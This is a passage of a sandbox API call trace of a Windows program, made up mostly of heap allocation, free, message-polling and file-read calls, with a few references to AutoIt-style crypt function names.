| out: lpMsg=0x144f2dc) returned 0 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0110.019] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0110.019] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0110.019] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0110.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0110.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0110.023] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0110.023] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x1f8, lpOverlapped=0x0) returned 1 [0110.024] ReadFile (in: hFile=0x258, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0110.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0110.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0110.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43cce80 [0110.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0110.122] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca070 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43e8288 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cce80 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.123] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43cce80 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cce80 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.123] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.123] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0110.123] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0110.123] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0110.124] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0110.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0110.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2450 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43cce80 [0110.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23e0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0110.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca178 [0110.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1f8) returned 0x43faa98 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0110.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0110.125] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0110.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0110.125] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0110.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0110.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0110.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0110.126] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0110.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0110.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0110.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9ec0 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0110.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0110.126] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.127] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0110.128] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0110.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0110.128] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0110.128] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0110.128] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0110.129] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.129] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 